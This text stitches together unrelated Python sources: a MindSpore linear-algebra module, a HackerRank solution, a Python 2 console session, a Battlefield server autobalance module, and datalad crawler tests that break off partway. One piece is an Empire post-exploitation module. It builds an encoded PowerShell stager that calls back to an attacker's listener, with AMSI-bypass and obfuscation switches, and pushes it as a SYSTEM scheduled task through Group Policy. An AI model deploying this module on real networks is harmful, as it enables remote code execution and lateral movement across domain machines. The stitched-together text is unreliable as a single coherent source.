client.get_pvp_talent_slots(7) assert response == snapshot # Copyright 2021 Huawei Technologies Co., Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ """Linear algebra submodule""" from .. import numpy as mnp from .. import ops from .ops import SolveTriangular from .ops import CholeskySolver from .ops import Cholesky from .ops import EighNet from ..ops import operations as P __all__ = ['block_diag', 'solve_triangular', 'inv', 'cho_factor', 'cholesky', 'cho_solve', 'eigh'] def block_diag(*arrs): """ Create a block diagonal matrix from provided arrays. Given the inputs `A`, `B` and `C`, the output will have these Tensor arranged on the diagonal:: [[A, 0, 0], [0, B, 0], [0, 0, C]] Args: A, B, C, ... (Tensor): up to 2-D Input Tensors. A 1-D Tensor or a 2-D Tensor with shape ``(1,n)``. Returns: D (Tesnor): Tensor with `A`, `B`, `C`, ... on the diagonal. `D` has the same dtype as `A`. Raises: ValueError: If there are tensors with dimensions higher than 2 in all arguments. 
Supported Platforms: ``CPU`` ``GPU`` Examples: >>> import numpy as onp >>> from mindspore.common import Tensor >>> from mindspore.scipy.linalg import block_diag >>> A = Tensor(onp.array([[1, 0], [0, 1]])) >>> B = Tensor(onp.array([[3, 4, 5], [6, 7, 8]])) >>> C = Tensor(onp.array([[7]])) >>> P = Tensor(onp.zeros((2, ), dtype='int32')) >>> block_diag(A, B, C) [[1, 0, 0, 0, 0, 0], [0, 1, 0, 0, 0, 0], [0, 0, 3, 4, 5, 0], [0, 0, 6, 7, 8, 0], [0, 0, 0, 0, 0, 7]] >>> block_diag(A, P, B, C) [[1, 0, 0, 0, 0, 0], [0, 1, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0], [0, 0, 3, 4, 5, 0], [0, 0, 6, 7, 8, 0], [0, 0, 0, 0, 0, 7]] """ if not arrs: return mnp.zeros((1, 0)) bad_shapes = [i for i, a in enumerate(arrs) if a.ndim > 2] if bad_shapes: raise ValueError("Arguments to mindspore.scipy.linalg.block_diag must have at " "most 2 dimensions, got {} at argument {}." .format(arrs[bad_shapes[0]], bad_shapes[0])) arrs = [mnp.atleast_2d(a) for a in arrs] accum = arrs[0] for arr in arrs[1:]: _, c = arr.shape arr = ops.Pad(((0, 0), (accum.shape[-1], 0)))(arr) accum = ops.Pad(((0, 0), (0, c)))(accum) accum = mnp.concatenate([accum, arr], axis=0) return accum def solve_triangular(A, b, trans=0, lower=False, unit_diagonal=False, overwrite_b=False, debug=None, check_finite=True): """ Solve the equation `a x = b` for `x`, assuming a is a triangular matrix. Args: A (Tensor): A triangular matrix of shape :math:`(N, N)`. b (Tensor): A tensor of shape :math:`(M,)` or :math:`(M, N)`. Right-hand side matrix in :math:`A x = b`. lower (bool, optional): Use only data contained in the lower triangle of `a`. Default is to use upper triangle. trans (0, 1, 2, 'N', 'T', 'C', optional): Type of system to solve: ======== ========= trans system ======== ========= 0 or 'N' a x = b 1 or 'T' a^T x = b 2 or 'C' a^H x = b ======== ========= unit_diagonal (bool, optional): If True, diagonal elements of :math:`A` are assumed to be 1 and will not be referenced. overwrite_b (bool, optional): Allow overwriting data in :math:`b` (may enhance performance) check_finite (bool, optional): Whether to check that the input matrices contain only finite numbers. Disabling may give a performance gain, but may result in problems (crashes, non-termination) if the inputs do contain infinities or NaNs. Returns: x (Tensor): A tensor of shape :math:`(M,)` or :math:`(M, N)`, which is the solution to the system :math:`A x = b`. Shape of :math:`x` matches :math:`b`. Raises: LinAlgError: If :math:`A` is singular Supported Platforms: ``CPU`` ``GPU`` Examples: Solve the lower triangular system :math:`A x = b`, where: [3 0 0 0] [4] A = [2 1 0 0] b = [2] [1 0 1 0] [4] [1 1 1 1] [2] >>> import numpy as onp >>> from mindspore.common import Tensor >>> import mindspore.numpy as mnp >>> from mindspore.scipy.linalg import solve_triangular >>> A = Tensor(onp.array([[3, 0, 0, 0], [2, 1, 0, 0], [1, 0, 1, 0], [1, 1, 1, 1]], onp.float64)) >>> b = Tensor(onp.array([4, 2, 4, 2], onp.float64)) >>> x = solve_triangular(A, b, lower=True, unit_diagonal=False, trans='N') >>> x Tensor(shape=[4], dtype=Float32, value= [ 1.33333337e+00, -6.66666746e-01, 2.66666651e+00, -1.33333313e+00]) >>> mnp.dot(A, x) # Check the result Tensor(shape=[4], dtype=Float32, value= [ 4.00000000e+00, 2.00000000e+00, 4.00000000e+00, 2.00000000e+00]) """ if isinstance(trans, int): trans_table = ['N', 'T', 'C'] trans = trans_table[trans] solve = SolveTriangular(lower, unit_diagonal, trans) return solve(A, b) def inv(a, overwrite_a=False, check_finite=True): """ Compute the inverse of a matrix. 
Args: a (Tensor): Tensor Square matrix to be inverted. overwrite_a (bool, optional): Discard data in `a` (may improve performance). Default is False. check_finite (bool, optional): Whether to check that the input matrix contains only finite numbers. Disabling may give a performance gain, but may result in problems (crashes, non-termination) if the inputs do contain infinities or NaNs. Returns: ainv (Tensor): Inverse of the matrix `a`. Raises: LinAlgError: If `a` is singular. ValueError: If `a` is not square, or not 2D. Supported Platforms: ``CPU`` ``GPU`` Examples: >>> import numpy as onp >>> from mindspore.common import Tensor >>> import mindspore.numpy as mnp >>> from mindspore.scipy.linalg import inv >>> a = Tensor(onp.array([[1., 2.], [3., 4.]])) >>> inv(a) [[-2. , 1. ], [ 1.5, -0.5]] >>> mnp.dot(a, inv(a)) [[ 1., 0.], [ 0., 1.]] """ matrix_inverse = P.MatrixInverse(adjoint=False) return matrix_inverse(a) def cho_factor(a, lower=False, overwrite_a=False, check_finite=True): """ Compute the Cholesky decomposition of a matrix, to use in cho_solve Returns a matrix containing the Cholesky decomposition, ``A = L L*`` or ``A = U* U`` of a Hermitian positive-definite matrix `a`. The return value can be directly used as the first parameter to cho_solve. .. warning:: The returned matrix also contains random data in the entries not used by the Cholesky decomposition. If you need to zero these entries, use the function `cholesky` instead. Args: a (Tensor): square Matrix of (M, M) to be decomposed lower (bool, optional): Whether to compute the upper or lower triangular Cholesky factorization (Default: upper-triangular) overwrite_a(bool, optional): Whether to overwrite data in a (may improve performance) check_finite(bool, optional): Whether to check that the input matrix contains only finite numbers. Disabling may give a performance gain, but may result in problems (crashes, non-termination) if the inputs do contain infinities or NaNs. Returns: c (Tensor): Matrix whose upper or lower triangle contains the Cholesky factor of `a`. Other parts of the matrix contain random data. lower (bool, optional): Flag indicating whether the factor is in the lower or upper triangle Raises: LinAlgError: Raised if decomposition fails. Supported Platforms: ``CPU`` ``GPU`` Examples: >>> import numpy as onp >>> from mindspore.common import Tensor >>> from mindspore.scipy.linalg import cho_factor >>> A = Tensor(onp.array([[9, 3, 1, 5], [3, 7, 5, 1], [1, 5, 9, 2], [5, 1, 2, 6]]).astype(onp.float32)) >>> c, low = cho_factor(A) >>> c [[ 2.9999998 0.99999994 0.3333333 1.6666665 ] [ 0. 2.4494896 1.9051585 -0.27216542] [ 0. 0. 2.2933078 0.8559527 ] [ 0. 0. 0. 1.5541859 ]] """ cholesky_net = Cholesky(lower=lower, clean=False) c = cholesky_net(a) return c, lower def cholesky(a, lower=False, overwrite_a=False, check_finite=True): """ Compute the Cholesky decomposition of a matrix. Returns the Cholesky decomposition, :math:`A = L L^*` or :math:`A = U^* U` of a Hermitian positive-definite matrix A. Args: a (Tensor): square Matrix of (M, M) to be decomposed lower (bool, optional): Whether to compute the upper- or lower-triangular Cholesky factorization. Default is upper-triangular. overwrite_a (bool, optional): Whether to overwrite data in `a` (may improve performance). check_finite (bool, optional): Whether to check that the input matrix contains only finite numbers. Disabling may give a performance gain, but may result in problems (crashes, non-termination) if the inputs do contain infinities or NaNs. 
Returns: c (Tensor): Upper- or lower-triangular Cholesky factor of `a`. Raises: LinAlgError: if decomposition fails. Supported Platforms: ``CPU`` ``GPU`` Examples: >>> import numpy as onp >>> from mindspore.common import Tensor >>> from mindspore.scipy.linalg import cholesky >>> a = Tensor(onp.array([[1, -2],[2, 5]]).astype(onp.float32)) >>> L = cholesky(a, lower=True) >>> L [[1., 0.], [2., 1.]] """ cholesky_net = Cholesky(lower=lower, clean=True) c = cholesky_net(a) return c def cho_solve(c_and_lower, b, overwrite_b=False, check_finite=True): """Solve the linear equations Ax = b, given the Cholesky factorization of A. Args: c_and_lower ((Tensor, bool)): Cholesky factorization of a, as given by cho_factor b (Tensor): Right-hand side overwrite_b (bool, optional): Whether to overwrite data in b (may improve performance) check_finite (bool, optional): Whether to check that the input matrices contain only finite numbers. Disabling may give a performance gain, but may result in problems (crashes, non-termination) if the inputs do contain infinities or NaNs. Returns: x (Tensor): The solution to the system A x = b Supported Platforms: ``CPU`` ``GPU`` Examples: >>> import numpy as onp >>> from mindspore.common import Tensor >>> from mindspore.scipy.linalg import cho_factor, cho_solve >>> A = Tensor(onp.array([[9, 3, 1, 5], [3, 7, 5, 1], [1, 5, 9, 2], [5, 1, 2, 6]]).astype(onp.float32)) >>> b = Tensor(onp.array([1, 1, 1, 1]).astype(onp.float32)) >>> c, low = cho_factor(A) >>> x = cho_solve((c, low), b) >>> x [-0.01749271, 0.11953353, 0.01166181, 0.1574344 ] """ (c, lower) = c_and_lower cholesky_solver_net = CholeskySolver(lower=lower) x = cholesky_solver_net(c, b) return x def eigh(a, b=None, lower=True, eigvals_only=False, overwrite_a=False, overwrite_b=False, turbo=True, eigvals=None, _type=1, check_finite=True): """ Solve a standard or generalized eigenvalue problem for a complex Hermitian or real symmetric matrix. Find eigenvalues Tensor ``w`` and optionally eigenvectors Tensor ``v`` of Tensor ``a``, where ``b`` is positive definite such that for every eigenvalue λ (i-th entry of w) and its eigenvector ``vi`` (i-th column of ``v``) satisfies:: a @ vi = λ * b @ vi vi.conj().T @ a @ vi = λ vi.conj().T @ b @ vi = 1 In the standard problem, ``b`` is assumed to be the identity matrix. Args: a (Tensor): (M, M) Tensor A complex Hermitian or real symmetric matrix whose eigenvalues and eigenvectors will be computed. b (Tensor, optional): (M, M) Tensor A complex Hermitian or real symmetric definite positive matrix in. If omitted, identity matrix is assumed. lower (bool, optional): Whether the pertinent Tensor data is taken from the lower or upper triangle of ``a`` and, if applicable, ``b``. (Default: lower) eigvals_only (bool, optional): Whether to calculate only eigenvalues and no eigenvectors. (Default: both are calculated) _type (int, optional): For the generalized problems, this keyword specifies the problem type to be solved for ``w`` and ``v`` (only takes 1, 2, 3 as possible inputs):: 1 => a @ v = w @ b @ v 2 => a @ b @ v = w @ v 3 => b @ a @ v = w @ v This keyword is ignored for standard problems. overwrite_a (bool, optional): Whether to overwrite data in ``a`` (may improve performance). Default is False. overwrite_b (bool, optional): Whether to overwrite data in ``b`` (may improve performance). Default is False. check_finite (bool, optional): Whether to check that the input matrices contain only finite numbers. 
Disabling may give a performance gain, but may result in problems (crashes, non-termination) if the inputs do contain infinities or NaNs. turbo (bool, optional): use divide and conquer algorithm (faster but expensive in memory, only for generalized eigenvalue problem and if full set of eigenvalues are requested.). Has no significant effect if eigenvectors are not requested. eigvals (tuple, optional): Indexes of the smallest and largest (in ascending order) eigenvalues and corresponding eigenvectors to be returned: 0 <= lo <= hi <= M-1. If omitted, all eigenvalues and eigenvectors are returned. Returns: w (Tensor): (N,) Tensor, The N (1<=N<=M) selected eigenvalues, in ascending order, each repeated according to its multiplicity. v (Tensor): (M, N) Tensor, (if ``eigvals_only == False``) Raises: LinAlgError: If eigenvalue computation does not converge, an error occurred, or b matrix is not definite positive. Note that if input matrices are not symmetric or Hermitian, no error will be reported but results will be wrong. Supported Platforms: ``CPU`` ``GPU`` Examples: >>> import numpy as onp >>> from mindspore.common import Tensor >>> from mindspore.scipy.linalg import eigh >>> A = Tensor(onp.array([[6, 3, 1, 5], [3, 0, 5, 1], [1, 5, 6, 2], [5, 1, 2, 2]])) >>> w, v = eigh(A) >>> onp.allclose(A @ v - v @ onp.diag(w), onp.zeros((4, 4))) True """ eigh_net = EighNet(not eigvals_only, lower=True) return eigh_net(a) hugolribeiro/hackerrank_exercises # Complete the hourglassSum function below. # Programmer: def hourglassSum(arr): hourglasses_sum = [] for line in range(1, 5): for column in range(1, 5): hourglass_sum = arr[line-1][column-1] + arr[line-1][column] + arr[line-1][column+1] + arr[line][column] + \ arr[line+1][column-1] + arr[line+1][column] + arr[line+1][column+1] hourglasses_sum.append(hourglass_sum) return max(hourglasses_sum) Python 2.7.10 (default, May 23 2015, 09:44:00) [MSC v.1500 64 bit (AMD64)] on win32 Type "copyright", "credits" or "license()" for more information. >>> import csv >>> def loadCsv(filename): lines = csv.reader(open(filename, "rb")) dataset = list(lines) for i in range(len(dataset)): dataset[i] = [float(x) for x in dataset[i]] return dataset >>> filename = 'G:/CODEWORK/bayes_classification.csv' >>> dataset = loadCsv(filename) >>> print('Loaded data file {0} with {1} rows').format(filename, len(dataset)) Loaded data file G:/CODEWORK/bayes_classification.csv with 768 rows >>> from __future__ import print_function from builtins import object from builtins import str from lib.common import helpers class Module(object): def __init__(self, mainMenu, params=[]): self.info = { 'Name': 'New-GPOImmediateTask', 'Author': ['@harmj0y'], 'Description': ("Builds an 'Immediate' schtask to push out through a specified GPO."), 'Software': 'S0111', 'Techniques': ['T1053'], 'Background': True, 'OutputExtension': None, 'NeedsAdmin': False, 'OpsecSafe': True, 'Language': 'powershell', 'MinLanguageVersion': '2', 'Comments': [ 'https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/' ] } # any options needed by the module, settable during runtime self.options = { # format: # value_name : {description, required, default_value} 'Agent': { 'Description': 'Agent to run module on.', 'Required': True, 'Value': '' }, 'TaskName': { 'Description': 'Name for the schtask to create.', 'Required': True, 'Value': 'Debug' }, 'TaskDescription': { 'Description': 'Name for the schtask to create.', 'Required': False, 'Value': 'Debugging functionality.' 
}, 'TaskAuthor': { 'Description': 'Name for the schtask to create.', 'Required': True, 'Value': 'NT AUTHORITY\System' }, 'GPOname': { 'Description': 'The GPO name to build the task for.', 'Required': False, 'Value': '' }, 'GPODisplayName': { 'Description': 'The GPO display name to build the task for.', 'Required': False, 'Value': '' }, 'Domain': { 'Description': 'The domain to query for the GPOs, defaults to the current domain.', 'Required': False, 'Value': '' }, 'DomainController': { 'Description': 'Domain controller to reflect LDAP queries through.', 'Required': False, 'Value': '' }, 'Listener': { 'Description': 'Listener to use.', 'Required': True, 'Value': '' }, 'UserAgent': { 'Description': 'User-agent string to use for the staging request (default, none, or other).', 'Required': False, 'Value': 'default' }, 'Proxy': { 'Description': 'Proxy to use for request (default, none, or other).', 'Required': False, 'Value': 'default' }, 'ProxyCreds': { 'Description': 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).', 'Required': False, 'Value': 'default' }, 'Remove': { 'Description': 'Switch. Remove the immediate schtask.', 'Required': False, 'Value': 'default' }, 'Obfuscate': { 'Description': 'Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for obfuscation types. For powershell only.', 'Required': False, 'Value': 'False' }, 'ObfuscateCommand': { 'Description': 'The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.', 'Required': False, 'Value': r'Token\All\1' }, 'AMSIBypass': { 'Description': 'Include mattifestation\'s AMSI Bypass in the stager code.', 'Required': False, 'Value': 'True' }, 'AMSIBypass2': { 'Description': 'Include Tal Liberman\'s AMSI Bypass in the stager code.', 'Required': False, 'Value': 'False' } } # save off a copy of the mainMenu object to access external functionality # like listeners/agent handlers/etc. self.mainMenu = mainMenu for param in params: # parameter format is [Name, Value] option, value = param if option in self.options: self.options[option]['Value'] = value def generate(self, obfuscate=False, obfuscationCommand=""): # Set booleans to false by default Obfuscate = False AMSIBypass = False AMSIBypass2 = False module_name = self.info["Name"] listener_name = self.options['Listener']['Value'] user_agent = self.options['UserAgent']['Value'] proxy = self.options['Proxy']['Value'] proxy_creds = self.options['ProxyCreds']['Value'] if (self.options['Obfuscate']['Value']).lower() == 'true': Obfuscate = True ObfuscateCommand = self.options['ObfuscateCommand']['Value'] if (self.options['AMSIBypass']['Value']).lower() == 'true': AMSIBypass = True if (self.options['AMSIBypass2']['Value']).lower() == 'true': AMSIBypass2 = True if not self.mainMenu.listeners.is_listener_valid(listener_name): # not a valid listener, return nothing for the script print(helpers.color("[!] 
Invalid listener: " + listener_name)) return "" else: # generate the PowerShell one-liner with all of the proper options set launcher = self.mainMenu.stagers.generate_launcher(listener_name, language='powershell', encode=True, obfuscate=Obfuscate, obfuscationCommand=ObfuscateCommand, userAgent=user_agent, proxy=proxy, proxyCreds=proxy_creds, AMSIBypass=AMSIBypass, AMSIBypass2=AMSIBypass2) command = "/c \"" + launcher + "\"" if command == "": return "" else: # read in the common powerview.ps1 module source code module_source = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1" try: f = open(module_source, 'r') except: print(helpers.color("[!] Could not read module source path at: " + str(module_source))) return "" module_code = f.read() f.close() # get just the code needed for the specified function script = helpers.generate_dynamic_powershell_script(module_code, module_name) script = module_name + " -Command cmd -CommandArguments '" + command + "' -Force" for option, values in self.options.items(): if option.lower() in ["taskname", "taskdescription", "taskauthor", "gponame", "gpodisplayname", "domain", "domaincontroller"]: if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch script += " -" + str(option) else: script += " -" + str(option) + " '" + str(values['Value']) + "'" script += ' | Out-String | %{$_ + \"`n\"};"`n' + str(module_name) + ' completed!"' if obfuscate: script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) script = helpers.keyword_obfuscation(script) return script Dankr4d/modmanager # vim: ts=4 sw=4 noexpandtab """ Team autobalance system. This is a autobalance system ModManager module ===== Config ===== # Allow Commander if 0 then we never autobalance the commander mm_autobalance.allowCommander 0 # Allow Squad Leader if 0 then we only autobalance squad leaders # if they are the only member of that squad mm_autobalance.allowSquadLeader 0 # Allow Squad Member if 0 then we only autobalance squad members # if there are only squad members, squad leaders and commander on the team mm_autobalance.allowSquadMember 0 # Allows plays to be switched teams at the end of a round # 0 => No swap # 1 => Swap teams # 2 => Randomise teams mm_autobalance.roundSwitch ===== History ===== v2.5 - 12/10/2011: Fixed being able to load on Heroes v2.4 - 12/10/2011: Added BFP4F Support v2.3 - 14/07/2009: Disabled this module for Heroes as its never valid due to the fixed player classes v2.2 - 07/10/2006: Fixed off by one issue on player connect v2.1 - 03/10/2006: Merged with ClanMatch and enhanced to have multiple on round change methods v2.0 - 13/09/2006: Enhancements / fixes merged from BF2142 Closed BETA 2 v1.9 - 30/08/2006: Added supported games Included changes from BF2142 Tuning BETA 2 v1.8 - 13/07/2006 Added gpm_coop checks from v1.4 patch v1.7 - 20/05/2006: Added gpm_coop check from v1.3 patch v1.6 - 08/08/2005: Fix for player joining during pre / post game not being balanced correctly. v1.5 - 03/08/2005: Optimised onPlayerConnect team check v1.4 - 21/07/2005: Flagged as reload safe v1.3 - 13/07/2005: Enhanced squad based autobalance descision making to take into account team composition. 
v1.2 - 09/07/2005: Added commander, and squad balance options v1.1 - 30/06/2005: Updated to ModManager format by v1.0: Created by: DICE """ import bf2 import host import random import mm_utils __version__ = 2.5 __required_modules__ = { 'modmanager': 1.6 } __supports_reload__ = True __supported_games__ = { 'bf2': True, 'bf2142': True, 'bfheroes': False, 'bfp4f': True } __description__ = "ModManager Team autobalance v%s" % __version__ configDefaults = { 'allowCommander': 0, 'allowSquadLeader': 0, 'allowSquadMember': 0, 'roundSwitch': 0, } class AutoBalance( object ): def __init__( self, modManager ): self.mm = modManager self.__state = 0 def onPlayerConnect( self, p ): """Autobalance the new player if required.""" if 1 != self.__state: return if self.mm.isBattleField2142() and not p.isValid(): return # dont team switch alive players, or they will have the wrong teams kit if p.isAlive(): return # place player on the team with least players team1 = 0 team2 = 0 for tp in bf2.playerManager.getPlayers(): if 1 == tp.getTeam(): team1 += 1 else: team2 += 1 # Ignore the new player's team entry # N.B. Doing it this way avoids a loop level check if 1 == p.getTeam(): team1 -= 1 else: team2 -= 1 if ( team2 * bf2.serverSettings.getTeamRatioPercent() / 100.0 ) > team1: p.setTeam(1) else: p.setTeam(2) def onPlayerDeath( self, p, vehicle ): """Autobalance a player that has died if required and allowed by the balance rules.""" if 1 != self.__state: return if p == None: return if self.mm.isBattleField2142(): # bf2142 specific if not p.isValid() or p.isAutoController(): return else: # bf2 specific if ( host.ss_getParam('gameMode') == "gpm_coop") and p.isAIPlayer(): return if not bf2.serverSettings.getAutoBalanceTeam(): return # dont use autobalance when its suicide/changes team if p.getSuicide(): p.setSuicide(0) return if ( not self.__config['allowCommander'] ) and p.isCommander(): # dont autobalance the commander return squadid = p.getSquadId() teamid = p.getTeam() players = bf2.playerManager.getPlayers() if ( not self.__config['allowSquadLeader'] ) and p.isSquadLeader(): # only autobalance the squad leader if they are the only # member of that squad squad_members = 0 for tp in players: if squadid == tp.getSquadId() and tp.index != p.index: # we have other members in this squad dont autobalance #self.mm.debug( 2, "AB: no ( squad leader with members )" ) return if ( not self.__config['allowSquadMember'] ) and ( squadid > 0 ): # only autobalance squad members if there are no none # squad members / commander on this team basic_players = 0 for tp in players: if tp.getTeam() != teamid: continue if tp.getSquadId() > 0: continue if tp.isCommander(): continue if host.sgl_getIsAIGame() and not tp.isAIPlayer(): continue # none squad member / commander of this team basic_players += 1 if 0 != basic_players: # we have basic players in this team we # will balance them instead #self.mm.debug( 2, "AB: no ( basic players avail )" ) return aiPlayerBalance = 0 team1 = 0 team2 = 0 for tp in players: if tp.getTeam() == 1: team1 += 1 else: team2 += 1 if tp.isAIPlayer(): aiPlayerBalance += 1 else: aiPlayerBalance -= 1 if host.sgl_getIsAIGame(): if self.mm.isBattleField2142() or not (host.ss_getParam('gameMode') == "gpm_coop"): if not (aiPlayerBalance < 0): if not p.isAIPlayer(): return team2 = team2 * bf2.serverSettings.getTeamRatioPercent() / 100.0 if ( teamid == 1 ): if ( team2 + 1 ) < team1: #self.mm.debug( 2, "AB: player '%s' -> team %d" % ( p.getName(), 2 ) ) p.setTeam( 2 ) elif ( teamid == 2 ): if ( team1 + 1 ) < team2: 
#self.mm.debug( 2, "AB: player '%s' -> team %d" % ( p.getName(), 1 ) ) p.setTeam( 1 ) def onPlayerChangeTeams( self, p, humanHasSpawned ): """Ensure the player isnt unbalancing the teams.""" if 1 != self.__state: return self.mm.debug( 2, "AB: change" ) if not bf2.serverSettings.getAutoBalanceTeam(): return # dont teamswitch alive players, or they will have the wrong teams kit if p.isAlive(): return if host.sgl_getIsAIGame() and ( self.mm.isBattleField2142() or not ( host.ss_getParam('gameMode') == "gpm_coop" ) ): if humanHasSpawned or p.isAIPlayer(): return # handling aiplayer team change autobalance when round not started team = p.getTeam() aiplayer = 0 for tp in bf2.playerManager.getPlayers(): if aiplayer == 0 and tp.getTeam() == team and tp.isAIPlayer(): aiplayer = tp break if aiplayer: if p.getTeam() == 1: aiplayer.setTeam(2) else: aiplayer.setTeam(1) else: # checking to see if player is allowed to change teams team1 = 0 team2 = 0 for tp in bf2.playerManager.getPlayers(): if tp.getTeam() == 1: team1 += 1 else: team2 += 1 if abs(team1 - team2) > 1: if p.getTeam() == 1: p.setTeam(2) else: p.setTeam(1) def onGameStatusChanged( self, status ): """Make a note of the game status""" """Switch players to the other team if end of round""" if 0 != self.__config['roundSwitch'] and bf2.GameStatus.PreGame == status and bf2.GameStatus.EndGame == self.mm.lastGameStatus: # End of round so swap players if 1 == self.__config['roundSwitch']: # Straight swap for player in bf2.playerManager.getPlayers(): # avoid autobalance changing us back player.setSuicide( 1 ) # Change their team if 1 == player.getTeam(): player.setTeam( 2 ) else: player.setTeam( 1 ) elif 2 == self.__config['roundSwitch']: # Randomise random.seed(); players = bf2.playerManager.getPlayers() random.shuffle( players ) i = 1 half = int( len( players ) / 2 ); for player in players: # avoid autobalance changing us back player.setSuicide( 1 ) # Change their team if i <= half: player.setTeam( 1 ) else: player.setTeam( 2 ) i += 1 def init( self ): """Provides default initialisation.""" self.__config = self.mm.getModuleConfig( configDefaults ) # Register our game handlers if 0 == self.__state: host.registerHandler( 'PlayerConnect', self.onPlayerConnect, 1 ) host.registerHandler( 'PlayerDeath', self.onPlayerDeath, 1 ) host.registerHandler( 'PlayerChangeTeams', self.onPlayerChangeTeams, 1 ) # Register your game handlers and provide any # other dynamic initialisation here host.registerGameStatusHandler( self.onGameStatusChanged ) self.__state = 1 def shutdown( self ): """Shutdown and stop processing.""" # Unregister game handlers and do any other # other actions to ensure your module no longer affects # the game in anyway host.unregisterGameStatusHandler( self.onGameStatusChanged ) # Flag as shutdown as there is currently way to do this self.__state = 2 def mm_load( modManager ): """Creates the auto balance object.""" return AutoBalance( modManager ) # emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*- # ex: set sts=4 ts=4 sw=4 noet: # ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ## # # See COPYING file distributed along with the datalad package for the # copyright and license terms. 
# # ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ## from datalad.tests.utils import known_failure_v6 from datalad.tests.utils import known_failure_direct_mode from datalad_crawler.pipelines.tests.utils import _test_smoke_pipelines from ..balsa import pipeline as ofpipeline, superdataset_pipeline import os import logging from os.path import exists from glob import glob from os.path import join as opj from mock import patch from ...nodes.crawl_url import crawl_url from ...nodes.matches import * from ...pipeline import run_pipeline, FinishPipeline from ...nodes.misc import Sink, assign, range_node, interrupt_if from ...nodes.annex import Annexificator, initiate_dataset from ...pipeline import load_pipeline_from_module from datalad.support.stats import ActivityStats from datalad.support.gitrepo import GitRepo from datalad.support.annexrepo import AnnexRepo from datalad.utils import chpwd from datalad.utils import find_files from datalad.utils import swallow_logs from datalad.tests.utils import with_tree from datalad.tests.utils import SkipTest from datalad.tests.utils import eq_, assert_not_equal, ok_, assert_raises from datalad.tests.utils import assert_in, assert_not_in, assert_true from datalad.tests.utils import skip_if_no_module from datalad.tests.utils import with_tempfile from datalad.tests.utils import serve_path_via_http from datalad.tests.utils import skip_if_no_network from datalad.tests.utils import use_cassette from datalad.tests.utils import ok_file_has_content from datalad.tests.utils import ok_file_under_git from logging import getLogger lgr = getLogger('datalad.crawl.tests') def test_smoke_pipelines(): yield _test_smoke_pipelines, superdataset_pipeline, [] TEST_TREE1 = { 'study': { 'show': { 'WG33': { 'index.html': """

    SPECIES:
    Human

    DESCRIPTION:
    DC Van Essen, , MF Glasser (2016) PMID: 27074495

    PUBLICATION:
    NeuroImage

    AUTHORS:
    • DC Van Essen
    • er
    """ }, }, 'download': { 'WG33.tar.gz': { 'file1.nii': "content of file1.nii", 'dir1': { 'file2.nii': "content of file2.nii", } } } }, 'file': { 'show': { 'JX5V': { 'index.html': """ Download (120 MB) """ }, 'R1BX': { 'index.html': """ Download (26 MB) """ } }, 'download': { 'file1.nii': "content of file1.nii", 'dir1': { 'file2.nii': "content of file2.nii", } } }, } @with_tree(tree=TEST_TREE1, archives_leading_dir=False) @serve_path_via_http @with_tempfile @with_tempfile @known_failure_direct_mode #FIXME @known_failure_v6 #FIXME def test_balsa_extract_meta(ind, topurl, outd, clonedir): list(initiate_dataset( template="balsa", dataset_name='dataladtest-WG33', path=outd, data_fields=['dataset_id'])({'dataset_id': 'WG33'})) with chpwd(outd): pipeline = ofpipeline('WG33', url=topurl) out = run_pipeline(pipeline) eq_(len(out), 1) with chpwd(outd): assert_true(exists(".datalad/meta/balsa.json")) f = open(".datalad/meta/balsa.json", 'r') contents = f.read() assert_true("SPECIES" and "DESCRIPTION" and "PUBLICATION" and "AUTHORS" in contents) _PLUG_HERE = '' @with_tree(tree={ 'study': { 'show': { 'WG33': { 'index.html': """ Download (146 MB) file1.nii dir1 / file2.nii %s """ % _PLUG_HERE, }, }, 'download': { 'WG33.tar.gz': { 'file1.nii': "content of file1.nii", 'dir1': { 'file2.nii': "content of file2.nii", } } } }, 'file': { 'show': { 'JX5V': { 'index.html': """ Download (120 MB) """ }, 'R1BX': { 'index.html': """ Download (26 MB) """ } }, 'download': { 'file1.nii': "content of file1.nii", 'dir1': { 'file2.nii': "content of file2.nii", } } }, }, archives_leading_dir=False ) @serve_path_via_http @with_tempfile @with_tempfile @known_failure_direct_mode #FIXME @known_failure_v6 #FIXME def test_balsa_pipeline1(ind, topurl, outd, clonedir): list(initiate_dataset( template="balsa", dataset_name='dataladtest-WG33', path=outd, data_fields=['dataset_id'])({'dataset_id': 'WG33'})) with chpwd(outd): pipeline = ofpipeline('WG33', url=topurl) out = run_pipeline(pipeline) eq_(len(out), 1) repo = AnnexRepo(outd, create=False) # to be used in the checks # Inspect the tree -- that we have all the branches branches = {'master', 'incoming', 'incoming-processed', 'git-annex'} eq_(set(repo.get_branches()), branches) # since now we base incoming on master -- and there were nothing custom # in master after incoming-processed, both branches should be the same eq_(repo.get_hexsha('master'), repo.get_hexsha('incoming-processed')) # but that one is different from incoming assert_not_equal(repo.get_hexsha('incoming'), repo.get_hexsha('incoming-processed')) commits = {b: list(repo.get_branch_commits(b)) for b in branches} eq_(len(commits['incoming']), 1 + 3) # +3 since now we base on master eq_(len(commits['incoming-processed']), 2 + 3) eq_(len(commits['master']), 5) # all commits out there -- init ds + init crawler + 1*(incoming, processed) with chpwd(outd): eq_(set(glob('*')), {'dir1', 'file1.nii'}) all_files = sorted(find_files('.')) fpath = opj(outd, 'file1.nii') ok_file_has_content(fpath, "content of file1.nii") ok_file_under_git(fpath, annexed=True) fpath2 = opj(outd, 'dir1', 'file2.nii') ok_file_has_content(fpath2, "content of file2.nii") ok_file_under_git(fpath2, annexed=True) target_files = { './.datalad/crawl/crawl.cfg', 